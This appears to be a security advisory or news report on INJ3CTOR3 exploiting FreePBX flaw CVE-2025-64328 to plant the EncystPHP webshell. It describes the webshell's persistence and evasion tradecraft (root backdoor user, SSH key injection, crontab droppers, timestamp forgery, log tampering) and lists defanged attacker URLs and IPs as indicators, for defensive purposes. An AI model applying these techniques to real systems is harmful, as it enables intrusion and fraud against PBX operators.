Critical FreePBX Vulnerability Exploited: EncystPHP Webshell Grants Attackers Full System Control
In early December 2025, cybersecurity researchers identified a sophisticated attack campaign targeting FreePBX systems, a widely used open-source VoIP PBX platform. The attackers exploited a critical vulnerability, designated as CVE-2025-64328, to deploy a persistent webshell known as EncystPHP, granting them complete administrative control over compromised systems.
Understanding CVE-2025-64328
CVE-2025-64328 is a post-authentication command injection flaw located within the Endpoint Manager module’s administrative interface, specifically in the `check_ssh_connect()` function of the Filestore component. This vulnerability allows authenticated users to execute arbitrary shell commands as the ‘asterisk’ user, providing a gateway for deeper system compromise.
Attribution to INJ3CTOR3
The malicious activities have been attributed to INJ3CTOR3, a financially motivated hacker group first identified in 2020. Initially, they targeted FreePBX systems by exploiting CVE-2019-19006. In 2022, the group shifted focus to Elastix systems, leveraging CVE-2021-45461. Their consistent pattern of targeting VoIP infrastructures underscores a strategic intent to monetize unauthorized access through methods like toll fraud and unauthorized call generation.
Exploitation Methodology
The attack campaign commenced with threat actors originating from Brazil, targeting environments managed by an Indian technology company specializing in cloud solutions and communication services. The attackers downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202, associated with the domain crm[.]razatelefonia[.]pro—a site masquerading as a VoIP management system. Accessing the new/ route on this domain redirected requests to another dropper named k.php.
Capabilities of EncystPHP Webshell
EncystPHP is a sophisticated webshell with advanced capabilities, including:
– Remote Command Execution: Allows attackers to execute arbitrary commands on the compromised system.
– Multi-Stage Persistence Mechanisms: Ensures long-term access through various persistence strategies.
– Evasion Techniques: Modifies file permissions of legitimate FreePBX components to prevent detection and removes competing webshells from the system.
Establishing Persistence
Upon deployment, EncystPHP establishes persistence by:
– Creating a Root-Level User Account: Adds a user named newfpbx with hardcoded credentials.
– Resetting User Account Passwords: Resets multiple user account passwords to a single value.
– Injecting SSH Public Keys: Maintains backdoor access by injecting SSH keys.
– Modifying System Configurations: Ensures SSH port 22 remains open for continuous remote access.
Camouflaging Malicious Activity
EncystPHP masquerades as a legitimate FreePBX file named ajax.php, blending seamlessly into the application structure to evade casual inspection. It employs MD5-hashed authentication, comparing plaintext passwords entered via the web interface against hard-coded hash values embedded in the code.
Interactive Interface: Ask Master
Once authenticated, the webshell exposes an interactive interface titled Ask Master, which includes predefined operational commands for:
– File System Enumeration: Lists files and directories.
– Process Inspection: Monitors running processes.
– Querying Active Asterisk Channels: Retrieves information on active communication channels.
– Listing SIP Peers: Displays Session Initiation Protocol peers.
– Retrieving Configuration Files: Accesses FreePBX and Elastix configuration files.
By leveraging elevated privileges within the Elastix and FreePBX administrative contexts, the webshell enables arbitrary command execution and initiates outbound call activity through the compromised PBX environment.
Multi-Stage Persistence Architecture
The attack implements a four-stage persistence mechanism to ensure long-term access:
1. Initial Persistence: Established through crontab entries that download the secondary dropper k.php every minute.
2. Subsequent Stages: Deploy additional droppers across multiple directories under /var/www/html/, including digium_phones/, rest_phones/, phones/, and freepbxphones/, creating redundant access points that increase resilience against removal attempts.
3. Timestamp Forgery: The malware forges timestamps to match legitimate files, making detection more challenging.
4. Log Tampering: EncystPHP tampers with log files and disables error reporting to hinder forensic analysis and detection efforts.
Indicators of Compromise (IoCs)
Organizations should be vigilant for the following IoCs:
– URLs:
– hxxp://45[.]234[.]176[.]202/new/c
– hxxp://45[.]234[.]176[.]202/new/k.php
– Domain:
– crm[.]razatelefonia[.]pro
– IP Addresses:
– 45[.]234[.]176[.]202
– 187[.]108[.]1[.]130
– SHA256 Hash:
– 71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302
Mitigation Strategies
To protect against this threat, organizations should:
1. Apply Patches Promptly: Ensure all FreePBX systems are updated to the latest versions that address CVE-2025-64328.
2. Restrict Access: Limit access to the FreePBX administrative interface to trusted networks only.
3. Monitor for IoCs: Regularly scan systems for the indicators of compromise listed above.
4. Implement Strong Authentication: Enforce robust authentication mechanisms to prevent unauthorized access.
5. Conduct Regular Security Audits: Perform periodic security assessments to identify and remediate vulnerabilities.
Conclusion
The exploitation of CVE-2025-64328 by the INJ3CTOR3 group highlights the critical need for vigilance in securing VoIP infrastructures. By understanding the attack vectors and implementing robust security measures, organizations can mitigate the risks associated with such sophisticated threats.
